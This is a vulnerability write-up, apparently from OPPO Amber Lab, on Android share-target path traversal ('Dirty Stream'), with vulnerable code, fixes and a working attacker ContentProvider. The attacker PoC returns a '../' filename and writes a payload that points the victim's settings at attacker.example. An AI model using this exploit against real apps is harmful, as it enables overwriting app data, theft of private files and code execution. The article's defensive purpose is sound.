Exploiting Android FileSharingActivity: Overwrite Files and Trigger Code Execution

This article analyzes a vulnerability in Android's FileSharingActivity that allows malicious apps to manipulate file-sharing intents, craft dangerous URIs and filenames, and ultimately overwrite sensitive data or execute arbitrary code, while also offering concrete mitigation strategies.

OPPO Amber Lab

Vulnerability Overview

Android isolates applications from one another: each app runs in its own sandbox, with its own process and a private data directory that other apps cannot read or write. To let apps exchange data and files across that boundary, Android provides the Content Provider component. A share target that trusts what a provider reports about a file, and where the file should be stored, can be abused through that component to leak sensitive information, overwrite files in the receiving app's private storage, and in some cases achieve arbitrary code execution. This vulnerability class was presented at Black Hat Asia 2023 as the "Dirty Stream" attack (see References).

Vulnerability Model

The flaw exists in Android apps that accept data from other apps, in particular share targets for files (email clients, browsers, SMS and social apps). The exported FileSharingActivity handles intents with the actions android.intent.action.SEND or android.intent.action.SEND_MULTIPLE and accepts audio, image, video and other MIME types. Because the activity is exported, any app on the device can send it such an intent directly, naming the target component explicitly instead of going through the system share sheet.

After receiving external data, FileSharingActivity invokes handleIntent, which queries the incoming Uri through the ContentResolver (ContentResolver.query()) to obtain the filename and size, typically the OpenableColumns.DISPLAY_NAME and OpenableColumns.SIZE columns, and then calls copyFile.

The copyFile method receives two parameters: the Uri supplied by the third‑party app, and the filename obtained in the previous step. The query is answered by whichever provider backs the Uri, so a sender that ships its own provider controls both values: it chooses the Uri, and its query() implementation returns whatever filename it likes. Crafted values for either parameter are enough to exploit the activity.
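The pattern described above, reconstructed as an added example for this article (it is not the code of any specific app; the class layout, the "received" subdirectory and the method bodies are assumptions). The comments mark where the sender-controlled DISPLAY_NAME turns into a path:

```java
// Reconstructed share-target pattern (example code written for this article).
// Class, method and directory names are assumed, not taken from a real app.
import android.app.Activity;
import android.content.Intent;
import android.database.Cursor;
import android.net.Uri;
import android.os.Bundle;
import android.provider.OpenableColumns;

import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;

public class FileSharingActivity extends Activity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        handleIntent(getIntent());
    }

    private void handleIntent(Intent intent) {
        if (!Intent.ACTION_SEND.equals(intent.getAction())) return;
        Uri uri = intent.getParcelableExtra(Intent.EXTRA_STREAM);
        if (uri == null) return;

        // Step 1: ask the provider behind the Uri for a display name (SIZE is read the same way).
        // The sender picked the Uri, so the sender's provider answers this query: the name is
        // sender-controlled data, not metadata the system vouches for.
        String name = null;
        try (Cursor c = getContentResolver().query(uri, null, null, null, null)) {
            if (c != null && c.moveToFirst()) {
                int nameIdx = c.getColumnIndex(OpenableColumns.DISPLAY_NAME);
                if (nameIdx >= 0) name = c.getString(nameIdx);
            }
        }
        if (name == null) return;

        // Step 2: copy the stream into private storage under that name.
        try {
            copyFile(uri, name);
        } catch (IOException e) {
            // error handling omitted
        }
    }

    // VULNERABLE: `name` is joined onto a directory without checking for separators or "..".
    // With DISPLAY_NAME = "../shared_prefs/settings.xml" the destination resolves to
    // /data/data/<victim>/shared_prefs/settings.xml instead of .../files/received/<name>.
    private void copyFile(Uri uri, String name) throws IOException {
        File dir = new File(getFilesDir(), "received");
        dir.mkdirs();
        File dest = new File(dir, name);
        try (InputStream in = getContentResolver().openInputStream(uri);
             OutputStream out = new FileOutputStream(dest)) {
            byte[] buf = new byte[8192];
            int n;
            while ((n = in.read(buf)) != -1) out.write(buf, 0, n);
        }
    }
}
```

Note that openInputStream(uri) is also served by the sender's provider, so the bytes written to that path are the sender's as well; nothing in this flow is validated by the victim.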

Exploitation

The first attack vector overwrites the victim app's data. The attacker constructs a Uri that points to a Provider it controls and has that Provider report a filename matching a target file in the victim's private storage, typically with "../" segments so that the path escapes the directory copyFile writes into. The attacker's Provider must implement query(), returning the chosen DISPLAY_NAME (and a SIZE), and openFile() (or openAssetFile()), returning a ParcelFileDescriptor whose contents are the attacker's payload; the victim's call to openInputStream() on the Uri is served by that method.

If the overwritten file is one the victim app later loads or executes (an APK, DEX or native .so kept in its private storage), the payload runs inside the victim's process with the victim's permissions, which is arbitrary code execution.
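An attacker-side sketch of the provider and intent described above, added as an example for this article (not code from the original post). The authority com.attacker.evil, the victim package and component, the target file shared_prefs/settings.xml and the "received" directory depth that the "../" climbs out of are all assumptions:

```java
// Attacker-side example (written for this article). Authority, victim package,
// target file and the victim's directory layout are placeholders/assumptions.
import android.content.ContentProvider;
import android.content.ContentValues;
import android.content.Context;
import android.content.Intent;
import android.database.Cursor;
import android.database.MatrixCursor;
import android.net.Uri;
import android.os.ParcelFileDescriptor;
import android.provider.OpenableColumns;

import java.io.File;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.IOException;

public class EvilProvider extends ContentProvider {
    // Filename the victim will join onto its private directory. One "../" per directory level
    // between the victim's write directory and the target (assumed: files/received -> shared_prefs).
    static final String DISPLAY_NAME = "../../shared_prefs/settings.xml";

    @Override public boolean onCreate() { return true; }

    // The victim calls query() to learn the filename; it gets the traversal string back.
    @Override
    public Cursor query(Uri uri, String[] projection, String selection,
                        String[] selectionArgs, String sortOrder) {
        MatrixCursor cursor = new MatrixCursor(
                new String[] {OpenableColumns.DISPLAY_NAME, OpenableColumns.SIZE});
        cursor.addRow(new Object[] {DISPLAY_NAME, payload().length()});
        return cursor;
    }

    // The victim's openInputStream(uri) lands here; it receives the payload bytes.
    @Override
    public ParcelFileDescriptor openFile(Uri uri, String mode) throws FileNotFoundException {
        return ParcelFileDescriptor.open(payload(), ParcelFileDescriptor.MODE_READ_ONLY);
    }

    // Payload kept in the attacker's own private storage; its bytes replace the target file.
    // Contents are illustrative: a shared_prefs XML whose key the victim is assumed to read.
    private File payload() {
        File f = new File(getContext().getFilesDir(), "payload.bin");
        if (!f.exists()) {
            try (FileOutputStream out = new FileOutputStream(f)) {
                out.write(("<?xml version='1.0' encoding='utf-8'?><map>"
                        + "<string name=\"endpoint\">http://attacker.example</string></map>")
                        .getBytes("UTF-8"));
            } catch (IOException ignored) { }
        }
        return f;
    }

    @Override public String getType(Uri uri) { return "image/png"; }
    @Override public Uri insert(Uri uri, ContentValues v) { return null; }
    @Override public int delete(Uri uri, String s, String[] a) { return 0; }
    @Override public int update(Uri uri, ContentValues v, String s, String[] a) { return 0; }

    // Sender side: a SEND intent aimed explicitly at the victim's exported share target,
    // bypassing the share sheet. Package and class names are assumed.
    static Intent buildShareIntent(Context ctx) {
        Intent i = new Intent(Intent.ACTION_SEND);
        i.setClassName("com.victim.app", "com.victim.app.FileSharingActivity");
        i.setType("image/png");
        i.putExtra(Intent.EXTRA_STREAM, Uri.parse("content://com.attacker.evil/share"));
        i.addFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION);
        return i;
    }
}
```

The provider has to be reachable from the victim's process: declare it in the attacker's manifest with android:exported="true", or with android:grantUriPermissions="true" so that the FLAG_GRANT_READ_URI_PERMISSION on the intent is enough. The number of "../" segments has to match the victim's actual layout, which the attacker can read from the victim's code or observe by sending a harmless name first.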

A second attack extracts sensitive data instead of overwriting it. The attacker directs copyFile to copy the victim's own private files (e.g., its databases) to a public location on external storage: the crafted Uri points at the victim's own Provider, and the filename carries path‑traversal sequences ("../") that resolve to a world‑readable path on the SD card. Because the victim app opens the Uri in its own process, its own Provider is reachable even if that Provider is not exported.

Fix Recommendations

Do not use the name a Provider reports (DISPLAY_NAME or any other query column) as an on‑disk filename. Generate a random name for the stored copy, or, if the original name must be preserved, validate it strictly: reject names containing path separators, "..", or NUL bytes. Treat the reported SIZE as untrusted as well, and cap the number of bytes actually copied rather than relying on it.

Validate all external data before it reaches a path. Canonicalize the destination with File.getCanonicalPath(), which resolves "../", "." and symbolic links rather than stripping them, and then check that the canonical path starts with the canonical path of the intended private directory followed by a path separator. A startsWith check without the trailing separator would accept a sibling directory such as .../files/received-evil/.
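A hardened copyFile that applies both recommendations, added as an example for this article (it is not the original app's fix). The "received" directory, the 50 MB cap and the helper names are assumptions; SafeCopy.copyFile returns the file it wrote and throws rather than writing anywhere outside that directory:

```java
// Hardened copy routine (example code written for this article; directory name,
// size cap and helper names are assumptions).
import android.content.Context;
import android.net.Uri;

import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.util.UUID;

public final class SafeCopy {
    // Upper bound on what we store; the provider's reported SIZE is not trusted.
    static final long MAX_BYTES = 50L * 1024 * 1024;

    private SafeCopy() {}

    // Copies the stream behind `uri` into <filesDir>/received under a name we choose.
    public static File copyFile(Context ctx, Uri uri, String untrustedName) throws IOException {
        File dir = new File(ctx.getFilesDir(), "received");
        if (!dir.isDirectory() && !dir.mkdirs()) throw new IOException("cannot create " + dir);

        // 1. The sender never picks the on-disk name. At most a short alphanumeric extension
        //    survives from the reported DISPLAY_NAME; the rest is replaced by a random UUID.
        File dest = new File(dir, UUID.randomUUID() + safeExtension(untrustedName));

        // 2. Defense in depth: getCanonicalPath() resolves "..", "." and symlinks (it does not
        //    strip them), so containment is checked against the canonical directory plus a
        //    trailing separator. Without the separator ".../received-evil/x" would pass.
        String dirCanon = dir.getCanonicalPath() + File.separator;
        String destCanon = dest.getCanonicalPath();
        if (!destCanon.startsWith(dirCanon)) {
            throw new IOException("destination escapes private directory: " + destCanon);
        }

        try (InputStream in = ctx.getContentResolver().openInputStream(uri);
             OutputStream out = new FileOutputStream(dest)) {
            if (in == null) throw new IOException("provider returned no stream");
            byte[] buf = new byte[8192];
            long copied = 0;
            int n;
            while ((n = in.read(buf)) != -1) {
                copied += n;
                if (copied > MAX_BYTES) throw new IOException("stream exceeds " + MAX_BYTES + " bytes");
                out.write(buf, 0, n);
            }
        } catch (IOException e) {
            dest.delete(); // never leave a partial or oversized file behind
            throw e;
        }
        return dest;
    }

    // Returns ".ext" when the name ends in a 1-8 character alphanumeric extension, else "".
    static String safeExtension(String name) {
        if (name == null) return "";
        int dot = name.lastIndexOf('.');
        if (dot < 0 || dot == name.length() - 1) return "";
        String ext = name.substring(dot + 1);
        return ext.matches("[A-Za-z0-9]{1,8}") ? "." + ext.toLowerCase() : "";
    }

    // For apps that must keep the sender's name: accept only a plain single-segment name.
    static boolean isSafeFileName(String name) {
        return name != null
                && !name.isEmpty()
                && name.length() <= 255
                && !name.equals(".") && !name.equals("..")
                && name.indexOf('/') < 0
                && name.indexOf('\\') < 0
                && name.indexOf('\0') < 0;
    }
}
```

With a name like "../../shared_prefs/settings.xml" the result is <filesDir>/received/<uuid>.xml, so the traversal never reaches a path that matters; the canonical containment check is kept anyway so that a later refactor which reintroduces the sender's name still fails closed. If the sender's name has to be shown to the user, keep it as display metadata (isSafeFileName) and never as the storage path.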

References

Android Developers, Receive simple data from other apps: https://developer.android.com/training/sharing/receive?hl=zh-cn

Black Hat Asia 2023 briefing, Dirty Stream Attack: Turning Android Share Targets into Attack Vectors: https://www.blackhat.com/asia-23/briefings/schedule/index.html#dirty-stream-attack-turning-android-share-targets-into-attack-vectors-30234

Video: https://www.youtube.com/watch?v=oZTGR9vJVMQ

Written by

OPPO Amber Lab

Centered on user data security and privacy, we conduct research and open our tech capabilities to developers, building an information‑security fortress for partners and users and safeguarding OPPO device security.
